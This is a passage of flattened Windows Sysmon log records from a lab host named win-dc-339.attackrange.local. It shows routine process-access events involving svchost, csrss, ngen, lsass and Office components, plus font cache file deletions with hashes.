Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.296{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.296{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-1.datMD5=E45A53AFCAAA1371E18C9A0B94840C2A,SHA256=966163DDF7E62AB4257C58720DD1D8FF7BF1FEFC4976D4131EF6B7A32189221B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.280{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.264{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.249{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.233{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.217{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDB-607E-D30C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.217{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.202{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.186{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDB-607E-D30C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.186{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDB-607E-D30C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.186{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.186{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-890.datMD5=2518640CEDA3CB73B5DFD044B4855F43,SHA256=DC31A95725277F1035381CE02B350FD5868E276C1B71739BD6B38742D806B2DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.186{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.171{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.155{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.155{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.139{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDB-607E-D20C-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.124{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.108{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.092{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.092{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDB-607E-D20C-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.092{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDB-607E-D20C-00000000BB01}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.077{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.077{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-781.datMD5=4127C9DA4AE649CFE536EE38A42FFFAB,SHA256=ED30C54445C32660BE3BFD57E0E125D235D273BC9EADDA82D9965D6C5FAD3086,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.077{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.061{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.061{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.046{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.046{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDA-607E-CF0C-00000000BB01}4380C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.030{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.014{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 